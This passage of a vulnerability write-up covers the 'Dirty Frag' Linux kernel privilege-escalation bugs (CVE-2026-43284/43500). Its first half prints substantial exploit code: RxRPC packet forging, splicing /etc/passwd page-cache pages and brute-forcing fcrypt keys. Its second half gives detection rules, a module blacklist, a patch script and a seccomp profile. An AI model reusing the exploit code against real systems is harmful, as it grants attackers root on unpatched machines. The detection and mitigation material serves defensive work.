   This also causes the client's conn->rxkad.cipher to be initialised
   with K, which is what we need for the verify path. */
challenge.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE;  /* 6 */
challenge.hdr.securityIndex = 2;                    /* RXKAD */
challenge.ch.nonce = htonl(0xDEADBEEFu);
sendto(udp_srv, &challenge, sizeof(challenge), ...);

/* Step 4: drain the RESPONSE (we don't verify it — we have no real
   ticket). The connection is now live and secured with K. */
udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500); /* ×4 */

/* Step 5: compute the wire cksum the forged DATA packet must carry.
   Uses AF_ALG pcbc(fcrypt) in userspace — no kernel modification.
   Two PCBC-encrypt operations: first to get csum_iv, then the actual
   cksum. This precomputation is what lets the forged packet sail past
   rxkad_verify_packet()'s cksum check and reach verify_packet_1(). */
compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv);
compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h);

RxRPC Variant: Splice Trigger and the In-Place Decrypt

With the cksum precomputed and the connection live, the exploit sends the forged DATA packet with /etc/passwd's page cache page in its frag — the same splice pattern as the ESP variant, just aimed at a different file and delivered as plain UDP to the client's RxRPC port rather than as a UDP-encapsulated ESP packet:

C — exp.c — do_one_trigger() splice and recv
/* Build forged DATA wire header with precomputed cksum */
struct rxrpc_wire_header mal = {0};
mal.type       = RXRPC_PACKET_TYPE_DATA;   /* 1 */
mal.flags      = RXRPC_LAST_PACKET;
mal.securityIndex = 2;                    /* RXKAD */
mal.cksum      = htons(cksum_h);          /* precomputed — passes first verify */
/* ... epoch, cid, callNumber from the real handshake ... */

/* connect udp_srv → client port so splice can send via a connected socket */
connect(udp_srv, &dst_cli, sizeof(dst_cli));

/* vmsplice: wire header (28 bytes) into pipe — normal copy from local struct */
vmsplice(p[1], &viv, 1, 0);

/* splice: 8 bytes of /etc/passwd at file offset splice_off into the pipe.
   Zero-copy — page cache page P of /etc/passwd is now in the pipe frag. */
loff_t off = splice_off;
splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK);

/* splice: pipe → udp_srv (connected to client). MSG_SPLICE_PAGES is set
   automatically because splice() to a socket uses that path.
   Page cache page P of /etc/passwd is now in the skb's frag[0]. */
splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0);

/* recvmsg on rxsk_cli: the client's kernel RxRPC stack picks up the
   forged DATA packet. It passes rxkad_verify_packet()'s cksum check,
   then reaches rxkad_verify_packet_1() which does in-place
   pcbc(fcrypt) decrypt — writing fcrypt_decrypt(C, K) into page P
   at offset splice_off. Returns -EPROTO, but the STORE is done. */
recvmsg(rxsk_cli, &m, 0);

RxRPC Variant: Userspace fcrypt Brute-Force — How It Actually Works

This is the most technically interesting part of the exploit, and the part most commonly described incorrectly in secondary sources. Here is exactly what the code does.

The problem: The 8 bytes that the kernel will STORE into the page cache are fcrypt_decrypt(C, K) — where C is the 8 bytes currently at the target file offset, and K is the 8-byte session key the attacker plants in the RxRPC token. The attacker controls K freely but cannot choose the STORE value directly — they must find a K whose decryption of C produces the desired plaintext bytes.

The search strategy: The code does not iterate keys sequentially from 0. Instead, it uses a splitmix64 PRNG — a high-quality, fast pseudo-random number generator — seeded from the current time XOR the PID, then generates random 8-byte keys and tests each one against the userspace fcrypt implementation:

C — exp.c — brute-force core loop (actual code)
static uint64_t fc_splitmix64(uint64_t *s) {
    uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

for (uint64_t iter = 0; iter < max_iters; iter++) {
    uint64_t r = fc_splitmix64(&seed);  /* random 8-byte key */
    memcpy(K, &r, 8);
    fcrypt_user_setkey(&ctx, K);
    fcrypt_user_decrypt(&ctx, P, C);  /* P = fcrypt_decrypt(C, K) */
    if (check(P)) { /* does P match our target predicate? */
        memcpy(K_out, K, 8); memcpy(P_out, P, 8);
        return 0;
    }
}

The target predicates and their probabilities: The code's comments directly state the success probability for each of the three searches — the numbers fall out of the structure of the constraints:

C — exp.c — predicate checks with probabilities from comments
/* K_A: P[0]==':' AND P[1]==':'  →  prob ~1.5e-5  (≈ 1 in 65,536)
   Expected: ~65,536 iterations. At 18M/s → < 4ms */
static inline int fc_check_pa_nullok(const uint8_t P[8]) {
    return P[0] == ':' && P[1] == ':';
}

/* K_B: P[0]=='0' AND P[1]==':'  →  prob ~1.5e-5  (≈ 1 in 65,536)
   Expected: ~65,536 iterations. At 18M/s → < 4ms */
static inline int fc_check_pb_nullok(const uint8_t P[8]) {
    return P[0] == '0' && P[1] == ':';
}

/* K_C: P[0]=='0', P[1]==':', P[7]==':',
        P[2..6] ≠ ':', '\0', '\n'        →  prob ~5.4e-8  (≈ 1 in 18.5M)
   Expected: ~18.5M iterations. At 18M/s → ~1 second */
static inline int fc_check_pc_nullok(const uint8_t P[8]) {
    if (P[0] != '0' || P[1] != ':' || P[7] != ':') return 0;
    for (int i = 2; i < 7; i++)
        if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0;
    return 1;
}

K_A and K_B each constrain only 2 bytes of the 8-byte output (probability 1/256² ≈ 1 in 65,536), so they are found in milliseconds. K_C constrains 3 specific byte values (P[0], P[1], P[7]) plus 5 middle bytes being "not colon, not null, not newline", giving a probability of (1/256)³ × (253/256)⁵ — about 1 in 18 million — found in roughly one second at 18 million keys/second.

The chained-ciphertext correction: After splice A fires at offset 4, the 8-byte window at offset 6 no longer holds the original file bytes — its first six bytes are whatever Pa_out[2..7] wrote there (the last two lie beyond splice A's reach). So when the code searches for K_B, it cannot use the Cb it originally read from the file; it must construct Cb_actual from the plaintext already written by splice A:

C — exp.c — chained ciphertext correction (actual code)
/* After splice A fires at offset 4 (8 bytes), bytes 6..11 now hold Pa_out[2..7].
   Bytes 12..13 (= Cb[6..7]) are still original — splice A didn't reach them.
   Cb_actual is what splice B's kernel decrypt will see as its ciphertext. */
memcpy(Cb_actual, Pa_out + 2, 6);
memcpy(Cb_actual + 6, Cb + 6, 2);
/* Search K_B against Cb_actual, not the original Cb */
find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok, Kb, Pb_out, ...);

/* Same correction for splice C: after B fires at offset 6, bytes 8..13
   now hold Pb_out[2..7]. Bytes 14..15 (= Cc[6..7]) are still original. */
memcpy(Cc_actual, Pb_out + 2, 6);
memcpy(Cc_actual + 6, Cc + 6, 2);
find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok, Kc, Pc_out, ...);

All three key searches happen entirely in userspace with no kernel interaction. Only after all three keys are found does the exploit fire the three kernel triggers in order. The entire brute-force stage completes in well under 2 seconds on a modern CPU.

The fcrypt implementation: The exploit embeds a complete port of the Linux kernel's crypto/fcrypt.c (originally by David Howells / KTH) as static C code — four 256-entry S-box tables, key schedule generation, and a 16-round Feistel decrypt function. It includes a built-in self-test verified against known kernel test vectors before the brute-force begins. If the selftest fails, the RxRPC path aborts cleanly rather than producing garbage output.


Detection Strategies

Like Copy Fail, Dirty Frag leaves nothing on disk and issues no write() syscalls to the target file. Detection has to focus on behavioral signals: the specific syscall patterns, module load events, and network activity that the exploit produces as a side effect.

One thing worth noting from the code: the ESP path runs inside a forked child process that calls unshare() and registers XFRM SAs, while the RxRPC path runs in the main process with no namespace changes. An EDR that tracks process trees will see different parent-child relationships for each variant. The default binary also suppresses its own stderr by dup2()-ing /dev/null over it, so it produces no console output under normal execution.

Signal | Detects? | Notes
sha256sum / rpm -V / AIDE / Tripwire | No | All compare on-disk content only. Page cache modifications are completely invisible to them.
auditd write() syscall auditing | No | The STORE happens inside the kernel's crypto scatter-gather walk, not through any write() syscall.
EDR on-access file scanners | No | These hook write syscalls. Since no write syscall occurs, nothing triggers.
XFRM SA registration via NETLINK_XFRM | Yes (ESP) | The exploit sends XFRM_MSG_NEWSA from a non-VPN process. Rare in legitimate workloads.
unshare(CLONE_NEWUSER|CLONE_NEWNET) | Yes (ESP) | The ESP child calls this before SA registration. Combine with subsequent XFRM activity for high confidence.
add_key("rxrpc", ...) from unexpected process | Yes (RxRPC) | No legitimate user process adds RxRPC keys outside of an AFS client. Any unexpected occurrence is high signal.
socket(AF_RXRPC) from unexpected process | Yes (RxRPC) | AF_RXRPC is socket family 33. The exploit opens one per trigger. Extremely rare outside AFS environments.
rxrpc or esp4 module loaded unexpectedly | Weak | Useful as a baseline check on servers that never use IPsec or AFS. Not reliable alone.
In-memory page cache audit | Yes | Compare live page cache of setuid binaries against their on-disk content. A mismatch at offset 0x78 of /usr/bin/su is definitive.
Defender for Linux hash signatures | Partial | Detects the known PoC binary. Bypassed trivially by recompiling with any code change.

Falco Rules

The most practical open-source detection approach is monitoring for the specific syscall combinations the exploit produces. No single syscall from either variant is alarming in isolation, but the combination, taken together with the process context, is distinctive:

YAML — falco-dirtyfrag.yaml
- rule: Dirty Frag ESP - XFRM SA from non-VPN process
  desc: Detects XFRM_MSG_NEWSA netlink from a process that is not a known VPN daemon (CVE-2026-43284)
  condition: evt.type = sendmsg
    and fd.type = netlink
    and evt.arg.msg contains xfrm_sa
    and not proc.name in (strongswan, charon, libreswan, ipsec, pluto)
  output: "XFRM SA from unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: CRITICAL
  tags: [CVE-2026-43284, lpe, dirtyfrag]

- rule: Dirty Frag RxRPC - add_key rxrpc from unexpected process
  desc: Detects add_key("rxrpc") from a non-AFS process (CVE-2026-43500)
  condition: evt.type = add_key
    and evt.arg.type = "rxrpc"
    and not proc.name in (afsd, kafs)
  output: "rxrpc key added by unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: CRITICAL
  tags: [CVE-2026-43500, lpe, dirtyfrag]

- rule: Dirty Frag - socket(AF_RXRPC) from unexpected process
  desc: Detects AF_RXRPC socket creation outside AFS context (both CVEs)
  condition: evt.type = socket
    and evt.arg.domain = 33
    and not proc.name in (afsd, kafs)
  output: "AF_RXRPC socket from unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: WARNING
  tags: [CVE-2026-43500, lpe, dirtyfrag]

auditd Rules

CLONE_NEWNET is 0x40000000 and CLONE_NEWUSER is 0x10000000, so the ESP path's unshare(CLONE_NEWUSER | CLONE_NEWNET) call passes a0 = 0x10000000 | 0x40000000 = 0x50000000. Filtering on a0=0x50000000 catches the exact combination used by the exploit while avoiding false positives from processes that unshare only a user namespace:

Bash — /etc/audit/rules.d/dirtyfrag.rules
# ESP variant: unshare(CLONE_NEWUSER|CLONE_NEWNET) = 0x50000000
-a always,exit -F arch=b64 -S unshare -F a0=0x50000000 -k dirtyfrag_esp

# RxRPC variant: any add_key call (filter by key type in ausearch)
-a always,exit -F arch=b64 -S add_key -k dirtyfrag_rxrpc

# Search for hits:
# ausearch -k dirtyfrag_esp
# ausearch -k dirtyfrag_rxrpc | grep rxrpc

Post-Exploitation: Detecting the Page Cache Modification

If you suspect a system has already been compromised, the most reliable check is to compare the live page cache content of /usr/bin/su against its on-disk content. A mismatch means the page cache was modified without going through the normal write path. The simplest way to do this is to drop the page cache and then compare:

Bash — check for page cache modification
# Step 1: hash the current in-memory version (reads from page cache)
sha256sum /usr/bin/su

# Step 2: drop page cache and re-hash (forces re-read from disk)
echo 3 | sudo tee /proc/sys/vm/drop_caches > /dev/null
sha256sum /usr/bin/su

# If the two hashes differ, the page cache was modified without
# touching the disk. This is the Dirty Frag / Copy Fail fingerprint.
# You can also check the specific marker bytes at offset 0x78:
xxd -s 0x78 -l 8 /usr/bin/su
drop_caches is disruptive in production: Running echo 3 > /proc/sys/vm/drop_caches on a busy server will cause a sudden spike in disk I/O as all cached file data is re-read from disk. On systems with large working sets this can cause a brief performance impact. Do it during a maintenance window or use targeted per-file cache inspection tools if available.

Mitigation — Check and Patch Now

Patch Status

The xfrm-ESP fix (CVE-2026-43284) is commit f4c50a4034e6 in the netdev/net tree, merged May 7, 2026. It sets the SKBFL_SHARED_FRAG flag on pages that enter via splice() in the IPv4/IPv6 datagram append paths, and modifies the skip_cow branch in esp4_input and esp6_input to check that flag — routing any skb with externally-pinned pages through the safe skb_cow_data() path.

The RxRPC fix (CVE-2026-43500) is a submitted patch (lore.kernel.org afKV2zGR6rrelPC7@v4bel) that adds || skb->data_len to the clone-check gate in call_event.c and conn_event.c, ensuring non-linear skbs also go through skb_copy() before in-place decrypt. It has not yet been merged into any mainline or stable tree.

No distribution has shipped either fix through standard update channels as of May 8, 2026.

Immediate Mitigation — Blacklist the Three Modules

The attack surface for both variants can be removed by blacklisting the three kernel modules involved. This does not affect standard disk encryption (LUKS/dm-crypt), TLS, or OpenSSL. Do not apply this on hosts that terminate or transit IPsec tunnels (strongSwan, Libreswan) — disabling esp4/esp6 will break the IPsec data path on those machines. For all other servers, this is a safe and immediate fix.

This is the exact mitigation command from the official researcher disclosure and confirmed by CloudLinux, AlmaLinux, and Red Hat advisories:

sudo sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

After applying the module blacklist, also flush the page cache. This is a separate but important step: if the exploit was already run on your system before the blacklist was in place, the page cache may still contain poisoned in-memory versions of system binaries. Flushing it forces all files to be re-read from the clean on-disk copies on next access:

sudo sh -c "echo 3 > /proc/sys/vm/drop_caches"
Note — "Copy Fail 2: Electric Boogaloo" alias: An earlier proof-of-concept repository published as "Copy Fail 2: Electric Boogaloo" refers to the same Dirty Frag vulnerability under a different name. There is no separate CVE for it. The canonical PoC is github.com/V4bel/dirtyfrag by Hyunwoo Kim. The same mitigation applies regardless of which name you encounter.

Automated Check & Patch Script

Bash — dirtyfrag-patch.sh
#!/usr/bin/env bash
# CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) — Checker & Patcher
# Blacklists esp4, esp6, rxrpc to remove Dirty Frag attack surface.
# Drops page cache to flush any prior exploitation.
# Safe on non-IPsec, non-AFS servers. Idempotent.

set -euo pipefail

RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'
CYAN='\033[0;36m';  BOLD='\033[1m';    NC='\033[0m'
CONF="/etc/modprobe.d/dirtyfrag.conf"
MODS=("esp4" "esp6" "rxrpc")

banner() {
  echo -e "${CYAN}"
  echo "  ╔═══════════════════════════════════════════════════╗"
  echo "  ║  CVE-2026-43284/43500 · Dirty Frag · Checker v1.0 ║"
  echo "  ╚═══════════════════════════════════════════════════╝"
  echo -e "${NC}"
}

check_root() {
  [[ $EUID -eq 0 ]] || { echo -e "${YELLOW}[!] Re-run with sudo to apply fixes.${NC}"; }
}

check_mitigation_applied() {
  [[ -f "$CONF" ]] && grep -q esp4 "$CONF" && grep -q rxrpc "$CONF"
}

check_modules() {
  echo -e "${BOLD}[*] Module status:${NC}"
  for mod in "${MODS[@]}"; do
    if lsmod 2>/dev/null | grep -q "^${mod}"; then
      echo -e "  ${RED}[✗] ${mod} is LOADED${NC}"
    elif modinfo "$mod" &>/dev/null; then
      echo -e "  ${YELLOW}[!] ${mod} available but not loaded${NC}"
    else
      echo -e "  ${GREEN}[✓] ${mod} not available on this system${NC}"
    fi
  done
}

apply_patch() {
  printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > "$CONF"
  echo -e "${GREEN}[✓] Created ${CONF}${NC}"
  for mod in "${MODS[@]}"; do
    modprobe -r "$mod" 2>/dev/null \
      && echo -e "${GREEN}[✓] Unloaded ${mod}${NC}" \
      || echo -e "${YELLOW}[i] ${mod} was not loaded${NC}"
  done
  echo 3 > /proc/sys/vm/drop_caches
  echo -e "${GREEN}[✓] Page cache flushed${NC}"
  echo
  echo -e "${GREEN}${BOLD}[✓] MITIGATED — esp4, esp6, rxrpc blocked. Page cache cleared.${NC}"
  echo -e "${CYAN}[i] Remove ${CONF} after your distro ships patched kernels.${NC}"
}

main() {
  banner; check_root; echo
  echo -e "${BOLD}[*] Kernel: $(uname -r)${NC}"; echo
  check_modules; echo

  if check_mitigation_applied; then
    echo -e "${GREEN}${BOLD}[✓] Mitigation already in place — ${CONF}${NC}"
    exit 0
  fi

  echo -e "${RED}${BOLD}[!] VULNERABLE: Dirty Frag (CVE-2026-43284 / CVE-2026-43500)${NC}"
  echo -e "${RED}    Public PoC available. Any local user can become root.${NC}"; echo

  if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}[!] Run as root to apply: sudo $0${NC}"; exit 1
  fi

  read -rp "$(echo -e "${YELLOW}Apply mitigation now? [y/N]: ${NC}")" CONFIRM
  [[ "$CONFIRM" =~ ^[Yy]$ ]] && apply_patch || echo -e "${YELLOW}[!] Not applied. System remains vulnerable.${NC}"
}

main "$@"
chmod +x dirtyfrag-patch.sh && sudo ./dirtyfrag-patch.sh

Container and Kubernetes Hardening

The ESP variant can escape container boundaries via the shared page cache, just like Copy Fail. A seccomp profile that denies any unshare() call whose flags include CLONE_NEWNET blocks the ESP variant inside containers — the profile below uses a masked match on the 0x40000000 bit, so the exploit's CLONE_NEWUSER | CLONE_NEWNET call is caught. To block the RxRPC variant as well, deny add_key outright; seccomp cannot inspect the key-type string, which sits behind a pointer, so filtering specifically on "rxrpc" keys is not possible:

JSON — seccomp-deny-dirtyfrag.json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["unshare"],
      "action": "SCMP_ACT_ERRNO",
      "args": [{"index": 0, "value": 1073741824, "op": "SCMP_CMP_MASKED_EQ", "valueTwo": 1073741824}]
    },
    {
      "names": ["add_key"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
Track Patch Status: xfrm-ESP fix — commit f4c50a4034e6 (netdev/net tree). RxRPC fix — pending merge, see lore.kernel.org patch. Distro trackers: Ubuntu (ubuntu.com/security/CVE-2026-43284), RHEL (access.redhat.com), AlmaLinux (almalinux.org). Until patched kernels land in your package manager, the module blacklist is the correct mitigation.

References & Further Reading

Primary Source github.com/V4bel/dirtyfrag
Dirty Frag — Official Disclosure, PoC, and Write-up by Hyunwoo Kim

The complete technical write-up (write-up.md), exploit source (exp.c), and disclosure timeline. Includes the full root cause analysis of both the ESP and RxRPC variants, exploit flow diagrams, and the submitted upstream patches.

Upstream Patch kernel.org
Kernel Fix: f4c50a4034e6 — SKBFL_SHARED_FRAG check in esp_input / esp6_input

The merged fix for CVE-2026-43284. Sets SKBFL_SHARED_FRAG in the IPv4/IPv6 datagram append paths when splice() supplies pages, and checks this flag in esp_input()/esp6_input() to force the safe skb_cow_data() path for externally-pinned pages.

Research bleepingcomputer.com
BleepingComputer — New Linux 'Dirty Frag' Zero-Day Gives Root on All Major Distros

Coverage of the public disclosure event including the broken embargo context, CVSS scoring, and affected distribution summary.

Advisory almalinux.org
AlmaLinux — Dirty Frag (CVE-2026-43284, CVE-2026-43500) Patched Kernels in Testing

AlmaLinux's advisory covering both CVEs, per-release impact analysis (AlmaLinux 8 is unaffected by the RxRPC variant as it does not build rxrpc.ko), and links to testing repository kernels.

Advisory access.redhat.com
Red Hat Security Bulletin RHSB-2026-003 — Dirty Frag Networking Subsystem LPE

Red Hat's official bulletin covering RHEL 8, 9, and 10 impact, configuration-based mitigations, and the expedited fix timeline.

Disclosure openwall.com
oss-security: Hyunwoo Kim — Full Dirty Frag Public Disclosure (2026-05-07)

The canonical public disclosure post on the oss-security mailing list, published after the embargo was broken by a third party. Contains the full technical description, timeline, and links to patches. This is the primary source all vendor advisories reference.

Related copy.fail
Copy Fail (CVE-2026-31431) — The Predecessor That Motivated Dirty Frag Research

The Copy Fail disclosure by Taeyang Lee that directly motivated Hyunwoo Kim's research into related page-cache write primitives in other kernel subsystems. Understanding Copy Fail is essential context for Dirty Frag. Dirty Frag exploits the same authencesn_decrypt() sink via a different entry path, and bypasses the Copy Fail mitigation entirely.